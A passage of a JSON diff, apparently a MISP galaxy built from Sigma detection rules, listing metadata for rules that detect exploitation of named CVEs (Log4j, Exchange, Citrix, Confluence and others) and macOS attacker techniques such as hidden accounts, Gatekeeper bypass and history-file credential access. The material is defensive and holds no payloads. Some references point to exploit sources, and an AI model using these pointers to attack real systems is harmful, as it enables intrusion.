+ "attack.t1190" + ] + }, + "uuid": "5ea8faa8-db8b-45be-89b0-151b84c82702", + "value": "Log4j RCE CVE-2021-44228 Generic" + }, + { + "description": "Detects a segmentation fault error message caused by a creashing apache worker process", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/02/28", + "falsepositive": [ + "Unknown" + ], + "filename": "web_apache_segfault.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "No established product", + "refs": [ + "http://www.securityfocus.com/infocus/1633", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_apache_segfault.yml" + ], + "tags": [ + "attack.impact", + "attack.t1499.004" + ] + }, + "uuid": "1da8ce0b-855d-4004-8860-7d64d42063b1", + "value": "Apache Segmentation Fault" + }, + { + "description": "Detects the exploitation of the Confluence vulnerability described in CVE-2019-3398", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/05/26", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2019_3398_confluence.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://devcentral.f5.com/s/articles/confluence-arbitrary-file-write-via-path-traversal-cve-2019-3398-34181", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2019_3398_confluence.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "e9bc39ae-978a-4e49-91ab-5bd481fc668b", + "value": "Confluence Exploitation CVE-2019-3398" + }, + { + "description": "Detects the exploitation of Microsoft Exchange ProxyToken vulnerability as described in CVE-2021-33766", + "meta": { + "author": "Florian Roth, Max Altgelt, Christian Burkard", + "creation_date": "2021/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2021_33766_msexchange_proxytoken.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_33766_msexchange_proxytoken.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "56973b50-3382-4b56-bdf5-f51a3183797a", + "value": "CVE-2021-33766 Exchange ProxyToken Exploitation" + }, + { + "description": "Detects exploitation of vulnerabilities in Arcadyan routers as reported in CVE-2021-20090 and CVE-2021-20091.", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/08/24", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2021_20090_2021_20091_arcadyan_router_exploit.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2", + "https://www.tenable.com/security/research/tra-2021-13", + "https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_20090_2021_20091_arcadyan_router_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "cve.2021.20090", + "cve.2021.20091" + ] + }, + "uuid": "f0500377-bc70-425d-ac8c-e956cd906871", + "value": "Arcadyan Router Exploitations" + }, + { + "description": "Detects the exploitation of the TerraMaster TOS vulnerability described in CVE-2020-28188", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/01/25", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2020_28188_terramaster_rce_exploit.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/", + "https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_28188_terramaster_rce_exploit.yml" + ], + "tags": [ + "attack.t1190", + "attack.initial_access", + "cve.2020.28188" + ] + }, + "uuid": "15c312b9-00d0-4feb-8870-7d940a4bdc5e", + "value": "TerraMaster TOS CVE-2020-28188" + }, + { + "description": "Detects CVE-2020-10148 SolarWinds Orion API authentication bypass attempts", + "meta": { + "author": "Bhabesh Raj, Tim Shelton", + "creation_date": "2020/12/27", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2020_10148_solarwinds_exploit.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://kb.cert.org/vuls/id/843464", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_10148_solarwinds_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "5a35116f-43bc-4901-b62d-ef131f42a9af", + "value": "CVE-2020-10148 SolarWinds Orion API Auth Bypass" + }, + { + "description": "Detects exploitation attempts using file upload vulnerability CVE-2021-22005 in the VMWare vCenter Server.", + "meta": { + "author": "Sittikorn S", + "creation_date": "2021/09/24", + "falsepositive": [ + "Vulnerability Scanning" + ], + "filename": "web_cve_2021_22005_vmware_file_upload.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.tenable.com/blog/cve-2021-22005-critical-file-upload-vulnerability-in-vmware-vcenter-server", + "https://kb.vmware.com/s/article/85717", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_22005_vmware_file_upload.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "b014ea07-8ea0-4859-b517-50a4e5b7ecec", + "value": "VMware vCenter Server File Upload CVE-2021-22005" + }, + { + "description": "Detects exploitation of flaw in path normalization in Apache HTTP server 2.4.49.\nAn attacker could use a path traversal attack to map URLs to files outside the expected document root.\nIf files outside of the document root are not protected by \"require all denied\" these requests can succeed.\nAdditionally this flaw could leak the source of interpreted files like CGI scripts.\nThis issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.\n", + "meta": { + "author": "daffainfo, Florian Roth", + "creation_date": "2021/10/05", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2021_41773_apache_path_traversal.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://nvd.nist.gov/vuln/detail/CVE-2021-41773", + "https://twitter.com/bl4sty/status/1445462677824761878", + "https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782", + "https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/cves/2021/CVE-2021-41773.yaml", + "https://twitter.com/ptswarm/status/1445376079548624899", + "https://twitter.com/h4x0r_dz/status/1445401960371429381", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_41773_apache_path_traversal.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "3007fec6-e761-4319-91af-e32e20ac43f5", + "value": "CVE-2021-41773 Exploitation Attempt" + }, + { + "description": "Detects attempts to exploit a Rejetto HTTP File Server (HFS) via CVE-2014-6287", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/19", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2014_6287_hfs_rce.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://vk9-sec.com/hfs-code-execution-cve-2014-6287/", + "https://www.exploit-db.com/exploits/39161", + "https://github.com/Twigonometry/Cybersecurity-Notes/blob/c875b0f52df7d2c7a870e75e1f0c2679d417931d/Writeups/Hack%20the%20Box/Boxes/Optimum/10%20-%20Website.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2014_6287_hfs_rce.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "attack.t1505.003", + "cve.2014.6287" + ] + }, + "uuid": "a133193c-2daa-4a29-8022-018695fcf0ae", + "value": "Rejetto HTTP File Server RCE" + }, + { + "description": "When IIS uses an old .Net Framework it's possible to enumerate folders with the symbol \"~\"", + "meta": { + "author": "frack113", + "creation_date": "2021/10/06", + "falsepositive": [ + "Unknown" + ], + "filename": "web_iis_tilt_shortname_scan.yml", + "level": "medium", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://github.com/lijiejie/IIS_shortname_Scanner", + "https://www.exploit-db.com/exploits/19525", + "https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/fuzzing/iis-shortname.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_iis_tilt_shortname_scan.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "7cb02516-6d95-4ffc-8eee-162075e111ac", + "value": "Successful IIS Shortname Fuzzing Scan" + }, + { + "description": "Detects the exploitation of VMware Workspace ONE Access Authentication Bypass vulnerability as described in CVE-2022-31656\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users.\nA malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/12", + "falsepositive": [ + "Vulnerability scanners" + ], + "filename": "web_cve_2022_31656_auth_bypass.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_31656_auth_bypass.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "fcf1101d-07c9-49b2-ad81-7e421ff96d80", + "value": "CVE-2022-31656 VMware Workspace ONE Access Auth Bypass" + }, + { + "description": "Detects exploitation attempts on Cisco ASA FTD systems exploiting CVE-2020-3452 with a status code of 200 (sccessful exploitation)", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/01/07", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2020_3452_cisco_asa_ftd.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://github.com/darklotuskdb/CISCO-CVE-2020-3452-Scanner-Exploiter", + "https://twitter.com/aboul3la/status/1286012324722155525", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_3452_cisco_asa_ftd.yml" + ], + "tags": [ + "attack.t1190", + "attack.initial_access", + "cve.2020.3452" + ] + }, + "uuid": "aba47adc-4847-4970-95c1-61dce62a8b29", + "value": "Cisco ASA FTD Exploit CVE-2020-3452" + }, + { + "description": "Detects suspicious access to URLs that was noticed in cases in which attackers exploitated the ADSelfService vulnerability CVE-2021-40539", + "meta": { + "author": "Tobias Michalski, Max Altgelt", + "creation_date": "2021/09/20", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2021_40539_adselfservice.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://us-cert.cisa.gov/ncas/alerts/aa21-259a", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_40539_adselfservice.yml" + ], + "tags": "No established tags" + }, + "uuid": "6702b13c-e421-44cc-ab33-42cc25570f11", + "value": "ADSelfService Exploitation" + }, + { + "description": "Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/02/29", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2020_0688_msexchange.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_0688_msexchange.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "fce2c2e2-0fb5-41ab-a14c-5391e1fd70a5", + "value": "CVE-2020-0688 Exchange Exploitation via Web Log" + }, + { + "description": "Detects suspicious windows strins in URI which could indicate possible exfiltration or webshell communication", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/06", + "falsepositive": [ + "Legitimate application and websites that use windows paths in their URL" + ], + "filename": "web_susp_windows_path_uri.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_susp_windows_path_uri.yml" + ], + "tags": [ + "attack.persistence", + "attack.exfiltration", + "attack.t1505.003" + ] + }, + "uuid": "9f6a34b4-2688-4eb7-a7f5-e39fef573d0e", + "value": "Suspicious Windows Strings In URI" + }, + { + "description": "Detects CVE-2019-19781 exploitation attempt against Citrix Netscaler, Application Delivery Controller and Citrix Gateway Attack", + "meta": { + "author": "Arnim Rupp, Florian Roth", + "creation_date": "2020/01/02", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2019_19781_citrix_exploit.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://isc.sans.edu/diary/25686", + "https://support.citrix.com/article/CTX267027", + "https://support.citrix.com/article/CTX267679", + "https://github.com/x1sec/CVE-2019-19781/blob/25f7ab97275b2d41800bb3414dac8ca3a78af7e5/CVE-2019-19781-DFIR.md", + "https://twitter.com/mpgn_x64/status/1216787131210829826", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2019_19781_citrix_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "ac5a6409-8c89-44c2-8d64-668c29a2d756", + "value": "Citrix Netscaler Attack CVE-2019-19781" + }, + { + "description": "Detects CVE-2020-0688 Exploitation attempts", + "meta": { + "author": "NVISO", + "creation_date": "2020/02/27", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2020_0688_exchange_exploit.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://github.com/Ridter/cve-2020-0688", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_0688_exchange_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "7c64e577-d72e-4c3d-9d75-8de6d1f9146a", + "value": "CVE-2020-0688 Exploitation Attempt" + }, + { + "description": "Detects SSTI attempts sent via GET requests in access logs", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/14", + "falsepositive": [ + "User searches in search boxes of the respective website", + "Internal vulnerability scanners can cause some serious FPs when used, if you experience a lot of FPs due to this think of adding more filters such as \"User Agent\" strings and more response codes" + ], + "filename": "web_ssti_in_access_logs.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection", + "https://github.com/payloadbox/ssti-payloads", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_ssti_in_access_logs.yml" + ], + "tags": "No established tags" + }, + "uuid": "ada3bc4f-f0fd-42b9-ba91-e105e8af7342", + "value": "Server Side Template Injection Strings" + }, + { + "description": "When exploiting this vulnerability with CVE-2021-26858, an SSRF attack is used to manipulate virtual directories", + "meta": { + "author": "frack113", + "creation_date": "2021/08/10", + "falsepositive": [ + "Unlikely" + ], + "filename": "web_cve_2021_26858_iis_rce.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://bi-zone.medium.com/hunting-down-ms-exchange-attacks-part-1-proxylogon-cve-2021-26855-26858-27065-26857-6e885c5f197c", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_26858_iis_rce.yml" + ], + "tags": "No established tags" + }, + "uuid": "effee1f6-a932-4297-a81f-acb44064fa3a", + "value": "ProxyLogon Reset Virtual Directories Based On IIS Log" + }, + { + "description": "Detects an authentication bypass vulnerability affecting the REST API URLs in ADSelfService Plus (CVE-2021-40539).", + "meta": { + "author": "Sittikorn S, Nuttakorn Tungpoonsup", + "creation_date": "2021/09/10", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2021_40539_manageengine_adselfservice_exploit.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html", + "https://us-cert.cisa.gov/ncas/alerts/aa21-259a", + "https://therecord.media/cisa-warns-of-zoho-server-zero-day-exploited-in-the-wild/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_40539_manageengine_adselfservice_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "attack.persistence", + "attack.t1505.003" + ] + }, + "uuid": "fcbb4a77-f368-4945-b046-4499a1da69d1", + "value": "CVE-2021-40539 Zoho ManageEngine ADSelfService Plus Exploit" + }, + { + "description": "Detects creation of startup item plist files that automatically get executed at boot initialization to establish persistence.", + "meta": { + "author": "Alejandro Ortuno, oscd.community", + "creation_date": "2020/10/14", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "file_event_macos_startup_items.yml", + "level": "low", + "logsource.category": "file_event", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1037.005/T1037.005.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/file_event/file_event_macos_startup_items.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1037.005" + ] + }, + "uuid": "dfe8b941-4e54-4242-b674-6b613d521962", + "value": "Startup Items" + }, + { + "description": "Detects additions to the Emond Launch Daemon that adversaries may use to gain persistence and elevate privileges.", + "meta": { + "author": "Alejandro Ortuno, oscd.community", + "creation_date": "2020/10/23", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "file_event_macos_emond_launch_daemon.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.014/T1546.014.md", + "https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/file_event/file_event_macos_emond_launch_daemon.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.014" + ] + }, + "uuid": "23c43900-e732-45a4-8354-63e4a6c187ce", + "value": "MacOS Emond Launch Daemon" + }, + { + "description": "Detects usage of system utilities (only grep for now) to discover security software discovery", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2020/10/19", + "falsepositive": [ + "Legitimate activities" + ], + "filename": "proc_creation_macos_security_software_discovery.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_security_software_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1518.001" + ] + }, + "uuid": "0ed75b9c-c73b-424d-9e7d-496cd565fbe0", + "value": "Security Software Discovery - MacOs" + }, + { + "description": "Detects attempts to use screencapture to collect macOS screenshots", + "meta": { + "author": "remotephone, oscd.community", + "creation_date": "2020/10/13", + "falsepositive": [ + "Legitimate user activity taking screenshots" + ], + "filename": "proc_creation_macos_screencapture.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/screenshot.py", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_screencapture.yml" + ], + "tags": [ + "attack.collection", + "attack.t1113" + ] + }, + "uuid": "0877ed01-da46-4c49-8476-d49cdd80dfa7", + "value": "Screen Capture - macOS" + }, + { + "description": "Detects usage of system utilities to discover files and directories", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2020/10/19", + "falsepositive": [ + "Legitimate activities" + ], + "filename": "proc_creation_macos_file_and_directory_discovery.yml", + "level": "informational", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_file_and_directory_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1083" + ] + }, + "uuid": "089dbdf6-b960-4bcc-90e3-ffc3480c20f6", + "value": "File and Directory Discovery - MacOS" + }, + { + "description": "Detects execution of AppleScript of the macOS scripting language AppleScript.", + "meta": { + "author": "Alejandro Ortuno, oscd.community", + "creation_date": "2020/10/21", + "falsepositive": [ + "Application installers might contain scripts as part of the installation process." + ], + "filename": "proc_creation_macos_applescript.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.002/T1059.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_applescript.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.002" + ] + }, + "uuid": "1bc2e6c5-0885-472b-bed6-be5ea8eace55", + "value": "MacOS Scripting Interpreter AppleScript" + }, + { + "description": "Detects macOS Gatekeeper bypass via xattr utility", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2020/10/19", + "falsepositive": [ + "Legitimate activities" + ], + "filename": "proc_creation_macos_xattr_gatekeeper_bypass.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.001/T1553.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_xattr_gatekeeper_bypass.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1553.001" + ] + }, + "uuid": "f5141b6d-9f42-41c6-a7bf-2a780678b29b", + "value": "Gatekeeper Bypass via Xattr" + }, + { + "description": "Detects enumeration of local or remote network services.", + "meta": { + "author": "Alejandro Ortuno, oscd.community", + "creation_date": "2020/10/21", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_macos_network_service_scanning.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_network_service_scanning.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1046" + ] + }, + "uuid": "84bae5d4-b518-4ae0-b331-6d4afd34d00f", + "value": "MacOS Network Service Scanning" + }, + { + "description": "Detects when the macOS Script Editor utility spawns an unusual child process.", + "meta": { + "author": "Tim Rauch (rule), Elastic (idea)", + "creation_date": "2022/10/21", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_macos_susp_execution_macos_script_editor.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-7f541fbc4a4a28a92970e8bf53effea5bd934604429112c920affb457f5b2685", + "https://wojciechregula.blog/post/macos-red-teaming-initial-access-via-applescript-url/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_execution_macos_script_editor.yml" + ], + "tags": [ + "attack.t1566", + "attack.t1566.002", + "attack.initial_access", + "attack.t1059", + "attack.t1059.002", + "attack.t1204", + "attack.t1204.001", + "attack.execution", + "attack.persistence", + "attack.t1553", + "attack.defense_evasion" + ] + }, + "uuid": "6e4dcdd1-e48b-42f7-b2d8-3b413fc58cb4", + "value": "Suspicious Execution via macOS Script Editor" + }, + { + "description": "Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detect using dd and truncate to add a junk data to file.", + "meta": { + "author": "Igor Fits, Mikhail Larin, oscd.community", + "creation_date": "2020/10/19", + "falsepositive": [ + "Legitimate script work" + ], + "filename": "proc_creation_macos_binary_padding.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.001/T1027.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_binary_padding.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.001" + ] + }, + "uuid": "95361ce5-c891-4b0a-87ca-e24607884a96", + "value": "Binary Padding - MacOS" + }, + { + "description": "Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.", + "meta": { + "author": "Alejandro Ortuno, oscd.community", + "creation_date": "2020/10/06", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_macos_create_account.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_create_account.yml" + ], + "tags": [ + "attack.t1136.001", + "attack.persistence" + ] + }, + "uuid": "51719bf5-e4fd-4e44-8ba8-b830e7ac0731", + "value": "Creation Of A Local User Account" + }, + { + "description": "Detects usage of \"find\" binary in a suspicious manner to perform discovery", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_macos_susp_find_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_find_execution.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1083" + ] + }, + "uuid": "85de3a19-b675-4a51-bfc6-b11a5186c971", + "value": "Potential Discovery Activity Using Find - MacOS" + }, + { + "description": "Detects creation of a hidden user account on macOS (UserID < 500) or with IsHidden option", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2020/10/10", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_macos_create_hidden_account.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.002/T1564.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_create_hidden_account.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.002" + ] + }, + "uuid": "b22a5b36-2431-493a-8be1-0bae56c28ef3", + "value": "Hidden User Creation" + }, + { + "description": "Detects commandline operations on shell history files", + "meta": { + "author": "Mikhail Larin, oscd.community", + "creation_date": "2020/10/17", + "falsepositive": [ + "Legitimate administrative activity", + "Legitimate software, cleaning hist file" + ], + "filename": "proc_creation_macos_susp_histfile_operations.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_histfile_operations.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.003" + ] + }, + "uuid": "508a9374-ad52-4789-b568-fc358def2c65", + "value": "Suspicious History File Operations" + }, + { + "description": "Detects usage of system utilities to discover system network connections", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2020/10/19", + "falsepositive": [ + "Legitimate activities" + ], + "filename": "proc_creation_macos_system_network_connections_discovery.yml", + "level": "informational", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_system_network_connections_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1049" + ] + }, + "uuid": "9a7a0393-2144-4626-9bf1-7c2f5a7321db", + "value": "System Network Connections Discovery - MacOs" + }, + { + "description": "Detects enumeration of local network configuration", + "meta": { + "author": "remotephone, oscd.community", + "creation_date": "2020/10/06", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_macos_system_network_discovery.yml", + "level": "informational", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_system_network_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1016" + ] + }, + "uuid": "58800443-f9fc-4d55-ae0c-98a3966dfb97", + "value": "System Network Discovery - macOS" + }, + { 